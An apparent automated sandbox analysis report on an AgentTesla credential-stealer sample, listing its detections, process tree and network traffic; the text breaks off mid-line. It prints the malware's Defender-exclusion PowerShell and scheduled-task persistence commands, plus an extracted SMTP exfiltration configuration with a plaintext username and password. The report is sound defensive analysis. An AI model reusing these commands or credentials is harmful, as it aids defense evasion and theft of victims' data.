Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DATASHEET.exe

Overview

General Information

Sample name:DATASHEET.exe
Analysis ID:1559980
MD5:8b627084e10ad9b77436a4c3d8ea5ebb
SHA1:7db5ee2ab5fdc91fa29a521f7f9779684f9e4abd
SHA256:10f6d70d363d93fce85e92f2ea94a36eda4c755606581cd101652afaa97a91fc
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DATASHEET.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\DATASHEET.exe" MD5: 8B627084E10AD9B77436A4C3D8EA5EBB)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8036 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • jwvzGqkYNEejno.exe (PID: 7876 cmdline: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe MD5: 8B627084E10AD9B77436A4C3D8EA5EBB)
    • schtasks.exe (PID: 3912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.ru", "Username": "negozio@depadova.cf", "Password": "graceofgod@amen"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.DATASHEET.exe.3d32700.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.DATASHEET.exe.3d32700.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.DATASHEET.exe.3d32700.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3189d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3190f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x31999:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31a2b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x31a95:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31b07:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x31b9d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31c2d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 10 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DATASHEET.exe", ParentImage: C:\Users\user\Desktop\DATASHEET.exe, ParentProcessId: 7336, ParentProcessName: DATASHEET.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", ProcessId: 7548, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DATASHEET.exe", ParentImage: C:\Users\user\Desktop\DATASHEET.exe, ParentProcessId: 7336, ParentProcessName: DATASHEET.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", ProcessId: 7548, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe, ParentImage: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe, ParentProcessId: 7876, ParentProcessName: jwvzGqkYNEejno.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp", ProcessId: 3912, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DATASHEET.exe", ParentImage: C:\Users\user\Desktop\DATASHEET.exe, ParentProcessId: 7336, ParentProcessName: DATASHEET.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp", ProcessId: 7640, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DATASHEET.exe", ParentImage: C:\Users\user\Desktop\DATASHEET.exe, ParentProcessId: 7336, ParentProcessName: DATASHEET.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe", ProcessId: 7548, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DATASHEET.exe", ParentImage: C:\Users\user\Desktop\DATASHEET.exe, ParentProcessId: 7336, ParentProcessName: DATASHEET.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp", ProcessId: 7640, ProcessName: schtasks.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: DATASHEET.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeAvira: detection malicious, Label: HEUR/AGEN.1305393
                    Found malware configuration
                    Source: 0.2.DATASHEET.exe.3d32700.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.ru", "Username": "negozio@depadova.cf", "Password": "graceofgod@amen"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeReversingLabs: Detection: 55%
                    Multi AV Scanner detection for submitted file
                    Source: DATASHEET.exeReversingLabs: Detection: 55%
                    Source: DATASHEET.exeVirustotal: Detection: 47%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: DATASHEET.exeJoe Sandbox ML: detected
                    Source: DATASHEET.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: DATASHEET.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Aezq.pdb source: DATASHEET.exe, jwvzGqkYNEejno.exe.0.dr
                    Source: Binary string: Aezq.pdbSHA256 source: DATASHEET.exe, jwvzGqkYNEejno.exe.0.dr
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 4x nop then jmp 07DB0C84h0_2_07DB0223
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 4x nop then jmp 07DB0C84h0_2_07DB0797
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 4x nop then jmp 07DB0C84h0_2_07DB0879
                    Source: C:\Users\user\Desktop\DATASHEET.exeCode function: 4x nop then jmp 07DB0C84h0_2_07DB0834
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 4x nop then jmp 06F8FBF4h9_2_06F8F193
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 4x nop then jmp 06F8FBF4h9_2_06F8F7E9
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 4x nop then jmp 06F8FBF4h9_2_06F8F7A4
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeCode function: 4x nop then jmp 06F8FBF4h9_2_06F8F707
                    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 77.88.21.158:587
                    Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 77.88.21.158:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: smtp.yandex.ru
                    Source: RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
                    Source: RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl(
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.000000000667F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000338E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.0000000001433000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.0000000006690000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4167415664.00000000065E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F19000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.0000000006690000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                    Source: RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign?
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.000000000667F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.000000000338E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4154589604.0000000001433000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178196919.0000000007F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
                    Source: RegSvcs.exe, 0000000D.00000002.4178842499.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003593000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177256601.0000000007EC4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4167415664.00000000065E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4176959760.0000000007EB0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.0000000003688000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F62000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4177916409.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4178238907.0000000007F19000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168134904.0000000006690000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4155316760.000000000149A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 